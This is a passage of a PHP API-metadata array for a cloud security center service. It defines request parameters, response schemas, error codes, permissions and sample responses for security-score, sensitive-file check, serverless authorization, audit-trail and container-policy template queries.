**SS_SAS_CLOUD_HC**: Pending Cloud Security Posture Management (CSPM) risks.'."\n" .'- **SS_SDDP_DATA_RISK**: Pending data security risks to remediate.'."\n" .'- **SS_WAF_API_RISK**: Pending API security risks.'."\n" .'- **SS_DDOS_BH_ASSET**: Assets in Black Hole Activated status.'."\n" .'- **SS_SAS_AK_LEAK**: Unhandled AccessKey/SecretKey leakage events.'."\n" .'- **SS_PRODUCT_CONNECT**: Security products not in Normal connection status.'."\n" .'- **SS_KEY_CONFIG**: Key feature configuration.'."\n" .'- **SS_PRODUCT_EXPIRE**: Products about to expire.'."\n" .'- **SS_AI_RISK**: AI application risks.', 'type' => 'string', 'example' => 'SSI_AI_VUL_RISK', 'title' => ''], 'Score' => ['description' => 'The deduction value of the individual item.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'ScoreThreshold' => ['description' => 'The deduction threshold of the individual item.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'Title' => ['description' => 'The name of the security score rule sub-item.', 'type' => 'string', 'example' => 'Unhandled application vulnerabilities exist.'."\n" ."\n", 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Category' => ['description' => 'The category of the security score rule. Valid values:'."\n" .'- **SS_SAS_HANDLE**: Security governance.'."\n" .'- **SS_SAS_RESPOND**: Security response.', 'type' => 'string', 'example' => 'SS_SAS_HANDLE', 'title' => ''], 'Score' => ['description' => 'The deduction threshold of the security score rule category.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'Title' => ['description' => 'The name of the security score rule category.', 'type' => 'string', 'example' => 'Security Response', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query custom security scoring rule details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSecurityScoreRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetSecurityScoreRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"SecurityScoreRuleList\\": [\\n {\\n \\"RuleType\\": \\"SS_ALARM\\",\\n \\"Score\\": 20,\\n \\"Title\\": \\"Unhandled Alerts\\",\\n \\"SecurityScoreItemList\\": [\\n {\\n \\"SubRuleType\\": \\"ALARM_SERIOUS\\",\\n \\"Score\\": 3,\\n \\"ScoreThreshold\\": 5,\\n \\"Title\\": \\"Unhandled Urgent Alert Event Exists\\"\\n }\\n ]\\n }\\n ],\\n \\"EnableStatus\\": true,\\n \\"SecurityScoreCategoryList\\": [\\n {\\n \\"SecurityRuleList\\": [\\n {\\n \\"RuleType\\": \\"SS_AI_RISK\\",\\n \\"Score\\": 10,\\n \\"Title\\": \\"AI Application Risks\\\\n\\",\\n \\"SecurityScoreItemList\\": [\\n {\\n \\"SubRuleType\\": \\"SSI_AI_VUL_RISK\\",\\n \\"Score\\": 5,\\n \\"ScoreThreshold\\": 10,\\n \\"Title\\": \\"Unhandled application vulnerabilities exist.\\\\n\\\\n\\"\\n }\\n ]\\n }\\n ],\\n \\"Category\\": \\"SS_SAS_HANDLE\\",\\n \\"Score\\": 30,\\n \\"Title\\": \\"Security Response\\"\\n }\\n ]\\n}","type":"json"}]', ], 'GetSensitiveDefineRuleConfig' => [ 'summary' => 'Queries custom check items for sensitive file tampering.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '195348', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" ."\n\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source of the sensitive file check item. Valid values:'."\n" .'- **image**: image'."\n" .'- **agentless**: agentless.', 'type' => 'string', 'required' => false, 'example' => 'image', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data details.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The custom configuration ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '44616', 'title' => ''], 'RuleCount' => ['description' => 'The total number of check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'SelectedCount' => ['description' => 'The number of selected check items.', 'type' => 'integer', 'format' => 'int32', 'example' => '99', 'title' => ''], 'RuleTree' => [ 'description' => 'The check item rule tree.', 'type' => 'array', 'items' => [ 'description' => 'The check item.', 'type' => 'object', 'properties' => [ 'ClassKey' => ['description' => 'The classification keyword of the check item.', 'type' => 'string', 'example' => 'password', 'title' => ''], 'ClassName' => ['description' => 'The classification name of the check item.', 'type' => 'string', 'example' => 'password', 'title' => ''], 'RuleList' => [ 'description' => 'The list of check item rules.', 'type' => 'array', 'items' => [ 'description' => 'The check item rule.', 'type' => 'object', 'properties' => [ 'RuleKey' => ['description' => 'The rule keyword.', 'type' => 'string', 'example' => 'huaweicloud_ak', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'huaweicloud_ak', 'title' => ''], 'Selected' => ['description' => 'Indicates whether the rule is selected. Valid values:'."\n" .'- **true**: Selected.'."\n" .'- **false**: Not selected.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'EnableNewRule' => ['description' => 'Indicates whether automatic check is enabled for new rules. This parameter takes effect only for agentless checks. Valid values:'."\n" ."\n" .'- **0**: Disabled.'."\n" ."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the query was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned by the API request.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned for the request.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query custom check items for sensitive file tampering', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSensitiveDefineRuleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetSensitiveDefineRuleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 44616,\\n \\"RuleCount\\": 100,\\n \\"SelectedCount\\": 99,\\n \\"RuleTree\\": [\\n {\\n \\"ClassKey\\": \\"password\\",\\n \\"ClassName\\": \\"password\\",\\n \\"RuleList\\": [\\n {\\n \\"RuleKey\\": \\"huaweicloud_ak\\",\\n \\"RuleName\\": \\"huaweicloud_ak\\",\\n \\"Selected\\": true\\n }\\n ]\\n }\\n ],\\n \\"EnableNewRule\\": 0\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92****\\"\\n}","type":"json"}]', ], 'GetServerlessAppAuthDetail' => [ 'summary' => 'Retrieves the authorization details of a serverless application.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '227933', 'abilityTreeNodes' => ['FEATUREsasA217JR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'VendorType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The cloud service to which the application belongs. Valid values:'."\n" .'- **ASK**'."\n" .'- **SAE**'."\n" .'- **ACS**.', 'type' => 'string', 'required' => false, 'example' => 'SAE'], ], [ 'name' => 'MachineType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The server type. Valid values:'."\n" .'- **RunD**'."\n" .'- **ECI**.', 'type' => 'string', 'required' => false, 'example' => 'RunD'], ], [ 'name' => 'AppId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The SAE application ID.'."\n" ."\n" .'> You can call the [ListMachineApps](~~ListMachineApps~~) operation to obtain the ID.', 'type' => 'string', 'required' => false, 'example' => '3de9f2ac-f***769226df'."\n"], ], [ 'name' => 'AppRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the application.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'IsPostPaid' => ['title' => '', 'description' => 'Indicates whether the instance uses pay-as-you-go billing. Valid values:'."\n" ."\n" .'- **true**: Yes.'."\n" .'- **false**: No.', 'type' => 'boolean', 'example' => 'true'], 'PostPaidModuleSwitch' => ['title' => '', 'description' => 'The pay-as-you-go module switch. Valid values:'."\n" ."\n" .'- **VUL**: vulnerability management module'."\n" .'- **CSPM**: Cloud Security Posture Management (CSPM) module'."\n" .'- **AGENTLESS**: agentless detection module'."\n" .'- **SERVERLESS**: serverless security module'."\n" .'- **CTDR**: Cloud Threat Detection and Response (CTDR) module.', 'type' => 'string', 'example' => 'SERVERLESS'], 'PostpaidInstanceId' => ['title' => '', 'description' => 'The pay-as-you-go instance ID.', 'type' => 'string', 'example' => '101'], 'PostPaidOpenTime' => ['title' => '', 'description' => 'The time when pay-as-you-go billing was enabled.', 'type' => 'integer', 'format' => 'int64', 'example' => '1655432638000'], 'PostPaidStatus' => ['title' => '', 'description' => 'The pay-as-you-go instance status. Valid values:'."\n" .'- **1**: active'."\n" .'- **2**: suspended due to overdue payment.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'IsServerlessPostPaidValid' => ['title' => '', 'description' => 'The serverless pay-as-you-go status. Valid values:'."\n" .'- **true**: active'."\n" .'- **false**: expired.', 'type' => 'boolean', 'example' => 'true'], 'AppId' => ['description' => 'The application ID.', 'type' => 'string', 'example' => 'c932b7a0***', 'title' => ''], 'InstanceCount' => ['description' => 'The number of instances.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CoreCount' => ['description' => 'The number of CPU cores.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'IsBind' => ['description' => 'Indicates whether the authorization is bound. Valid values:'."\n" ."\n" .'- **true**: Yes.'."\n" .'- **false**: No.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '30CBF632-109F-596F-97F2-451C8B2A****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Retrieve serverless application authorization details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetServerlessAppAuthDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetServerlessAppAuthDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"IsPostPaid\\": true,\\n \\"PostPaidModuleSwitch\\": \\"SERVERLESS\\",\\n \\"PostpaidInstanceId\\": \\"101\\",\\n \\"PostPaidOpenTime\\": 1655432638000,\\n \\"PostPaidStatus\\": 1,\\n \\"IsServerlessPostPaidValid\\": true,\\n \\"AppId\\": \\"c932b7a0***\\",\\n \\"InstanceCount\\": 1,\\n \\"CoreCount\\": 2,\\n \\"IsBind\\": true\\n },\\n \\"Success\\": true,\\n \\"RequestId\\": \\"30CBF632-109F-596F-97F2-451C8B2A****\\"\\n}","type":"json"}]', ], 'GetServerlessAuthSummary' => [ 'summary' => 'Retrieves the Serverless authorization overview.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '227930', 'abilityTreeNodes' => ['FEATUREsasA217JR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'VendorType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The cloud service to which the resource belongs. Valid values:'."\n" .'- **ASK**'."\n" .'- **SAE**'."\n" .'- **ACS**.', 'type' => 'string', 'required' => false, 'example' => 'SAE'], ], [ 'name' => 'MachineType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The server type. Valid values:'."\n" .'- **RunD**'."\n" .'- **ECI**.', 'type' => 'string', 'required' => false, 'example' => 'RunD'], ], [ 'name' => 'AppRegionId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The region ID of the application.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data details.', 'type' => 'object', 'properties' => [ 'IsPostPaid' => ['title' => '', 'description' => 'Indicates whether the instance is a pay-as-you-go instance. Valid values:'."\n" ."\n" .'- **true**: The instance is a pay-as-you-go instance.'."\n" .'- **false**: The instance is not a pay-as-you-go instance.', 'type' => 'boolean', 'example' => 'true'], 'PostPaidModuleSwitch' => ['title' => '', 'description' => 'The pay-as-you-go module switch. Valid values:'."\n" ."\n" .'- **VUL**: vulnerability fix module'."\n" .'- **CSPM**: Cloud Security Posture Management (CSPM) module'."\n" .'- **AGENTLESS**: agentless detection module'."\n" .'- **SERVERLESS**: Serverless security module'."\n" .'- **CTDR**: Cloud Threat Detection and Response (CTDR) module.', 'type' => 'string', 'example' => 'SERVERLESS'], 'PostpaidInstanceId' => ['title' => '', 'description' => 'The pay-as-you-go instance ID.', 'type' => 'string', 'example' => 'sas-postpay-**'], 'PostPaidOpenTime' => ['title' => '', 'description' => 'The time when pay-as-you-go billing was enabled. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1655432638000'], 'PostPaidStatus' => ['title' => '', 'description' => 'The pay-as-you-go instance status. Valid values:'."\n" .'- **1**: active'."\n" .'- **2**: suspended due to overdue payment.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'IsServerlessPostPaidValid' => ['title' => '', 'description' => 'The Serverless pay-as-you-go status. Valid values:'."\n" .'- **true**: active'."\n" .'- **false**: expired.', 'type' => 'boolean', 'example' => 'true'], 'TotalBindAppCount' => ['title' => '', 'description' => 'The total number of bound applications.', 'type' => 'integer', 'format' => 'int32', 'example' => '10'], 'TotalUnBindAppCount' => ['title' => '', 'description' => 'The total number of unbound applications.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'TotalBindInstanceCount' => ['title' => '', 'description' => 'The total number of bound instances.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'TotalUnBindInstanceCount' => ['title' => '', 'description' => 'The total number of unbound instances.', 'type' => 'integer', 'format' => 'int32', 'example' => '2'], 'TotalBindCoreCount' => ['title' => '', 'description' => 'The total number of bound cores.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'TotalUnBindCoreCount' => ['title' => '', 'description' => 'The total number of unbound cores.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'RegionId' => ['title' => '', 'description' => 'The region ID.', 'type' => 'string', 'example' => 'cn-hangzhou'], 'AutoBind' => ['description' => 'Indicates whether automatic binding is enabled. Valid values:'."\n" ."\n" .'- **0**: disabled'."\n" .'- **1**: enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'HasPreBindSetting' => ['description' => 'Indicates whether a pre-binding asset configuration exists. Pre-binding refers to the asset binding configuration that is selected in advance during purchase. Valid values:'."\n" .'- **0**: does not exist'."\n" .'- **1**: exists.', 'type' => 'boolean', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Retrieve serverless authorization overview', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetServerlessAuthSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetServerlessAuthSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"IsPostPaid\\": true,\\n \\"PostPaidModuleSwitch\\": \\"SERVERLESS\\",\\n \\"PostpaidInstanceId\\": \\"sas-postpay-**\\",\\n \\"PostPaidOpenTime\\": 1655432638000,\\n \\"PostPaidStatus\\": 1,\\n \\"IsServerlessPostPaidValid\\": true,\\n \\"TotalBindAppCount\\": 10,\\n \\"TotalUnBindAppCount\\": 1,\\n \\"TotalBindInstanceCount\\": 1,\\n \\"TotalUnBindInstanceCount\\": 2,\\n \\"TotalBindCoreCount\\": 1,\\n \\"TotalUnBindCoreCount\\": 1,\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"AutoBind\\": 1,\\n \\"HasPreBindSetting\\": true\\n },\\n \\"Success\\": true,\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\"\\n}","type":"json"}]', ], 'GetServiceTrail' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The ID of the region in which the instance resides. Valid values:'."\n" ."\n" .'- **cn-hangzhou**: China (Hangzhou)'."\n" .'- **ap-southeast-1**: Singapore.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The system generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C699E4E4-F2F4-58FC-A949-457FFE59****', 'title' => ''], 'ServiceTrail' => [ 'description' => 'The service trail configuration.', 'type' => 'object', 'properties' => [ 'Config' => ['description' => 'The enabling status of the service trail. Valid values:'."\n" ."\n" .'- **on**: Enabled.'."\n" .'- **off**: Shutdown.', 'type' => 'string', 'example' => 'on', 'title' => ''], 'CreateTime' => ['description' => 'The timestamp when the service trail was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1687250241000', 'title' => ''], 'UpdateTime' => ['description' => 'The timestamp when the service trail was last updated. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1687250241000', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve audit trail delivery configuration', 'summary' => 'Retrieves the audit trail delivery configuration.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetServiceTrail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetServiceTrail', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'SasTrail', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:sastrail'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C699E4E4-F2F4-58FC-A949-457FFE59****\\",\\n \\"ServiceTrail\\": {\\n \\"Config\\": \\"on\\",\\n \\"CreateTime\\": 1687250241000,\\n \\"UpdateTime\\": 1687250241000\\n }\\n}","type":"json"}]', ], 'GetStrategyTemplateDetail' => [ 'methods' => ['get', 'post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the rule template.'."\n" .'>You can call the [GetOpaStrategyTemplateSummary](~~GetOpaStrategyTemplateSummary~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The template details.', 'type' => 'object', 'properties' => [ 'StrategyId' => ['description' => 'The ID of the rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '1005', 'title' => ''], 'StrategyTemplateId' => ['description' => 'The ID of the template used by the rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '1204', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the cluster.', 'type' => 'string', 'example' => 'c8ca91e0907d94efaba7fb0827eb9****', 'title' => ''], 'StrategyName' => ['description' => 'The name of the rule.', 'type' => 'string', 'example' => 'Blank template', 'title' => ''], 'Description' => ['description' => 'The description of the rule.', 'type' => 'string', 'example' => 'Custom defense configuration', 'title' => ''], 'ClusterName' => ['description' => 'The name of the cluster.', 'type' => 'string', 'example' => 'hhht-cluster-02', 'title' => ''], 'UnScanedImage' => ['description' => 'Specifies whether the rule supports unscanned images. Valid values:'."\n" ."\n" .'- **true**: Supported.'."\n" .'- **false**: Not supported.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'MaliciousImage' => ['description' => 'Specifies whether the rule supports Internet malicious images. Valid values:'."\n" ."\n" .'- **true**: Supported.'."\n" .'- **false**: Not supported.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'Namespace' => [ 'description' => 'The list of namespaces.', 'type' => 'array', 'items' => ['description' => 'The namespace.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'title' => '', 'example' => '', ], 'ImageName' => [ 'description' => 'The list of image names.', 'type' => 'array', 'items' => ['description' => 'The image name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'title' => '', 'example' => '', ], 'Label' => [ 'description' => 'The list of container labels.', 'type' => 'array', 'items' => ['description' => 'The container label.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'title' => '', 'example' => '', ], 'RuleAction' => ['description' => 'The rule action. Valid values:'."\n" .'- **1**: alert'."\n" .'- **2**: block'."\n" .'- **3**: allow.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'WhiteList' => [ 'description' => 'The list of image tag whitelists.', 'type' => 'array', 'items' => ['description' => 'The image tag whitelist.', 'type' => 'string', 'example' => 'test-tag', 'title' => ''], 'title' => '', 'example' => '', ], 'AlarmDetail' => [ 'description' => 'The rule configuration information.', 'type' => 'object', 'properties' => [ 'Baseline' => [ 'description' => 'The baseline rule configuration information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The list of baseline risk levels. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" .'- **medium**: Medium.'."\n" .'- **low**: Low.', 'type' => 'array', 'items' => ['description' => 'The baseline risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" .'- **medium**: Medium.'."\n" .'- **low**: Low.', 'type' => 'string', 'example' => 'low', 'title' => ''], 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The list of baseline check items.', 'type' => 'array', 'items' => [ 'description' => 'The baseline check item information.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The unique identifier of the baseline check item.', 'type' => 'string', 'example' => 'ak_leak', 'title' => ''], 'Name' => ['description' => 'The name of the baseline check item.', 'type' => 'string', 'example' => 'Access Key plaintext storage', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Vul' => [ 'description' => 'The vulnerability rule configuration information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The list of vulnerability severity levels.', 'type' => 'array', 'items' => ['description' => 'The vulnerability severity level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" .'- **medium**: Medium.'."\n" .'- **low**: Low.', 'type' => 'string', 'example' => 'low', 'title' => ''], 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The list of vulnerability items.', 'type' => 'array', 'items' => [ 'description' => 'The vulnerability item information.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the vulnerability.', 'type' => 'string', 'example' => 'AVD-2023-1680169', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'ezOffice evoInterfaceServlet Info Leak', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'MaliciousFile' => [ 'description' => 'The malicious sample rule configuration information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => [ 'description' => 'The list of malicious sample risk levels.', 'type' => 'array', 'items' => ['description' => 'The malicious sample risk level. Valid values:'."\n" ."\n" .'- **high**: High.'."\n" ."\n" .'- **medium**: Medium.'."\n" ."\n" .'- **low**: Low.', 'type' => 'string', 'example' => 'low', 'title' => ''], 'title' => '', 'example' => '', ], 'Item' => [ 'description' => 'The list of malicious sample items.', 'type' => 'array', 'items' => [ 'description' => 'The malicious sample item information.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The unique identifier of the malicious sample.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'Name' => ['description' => 'The name of the malicious sample.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- 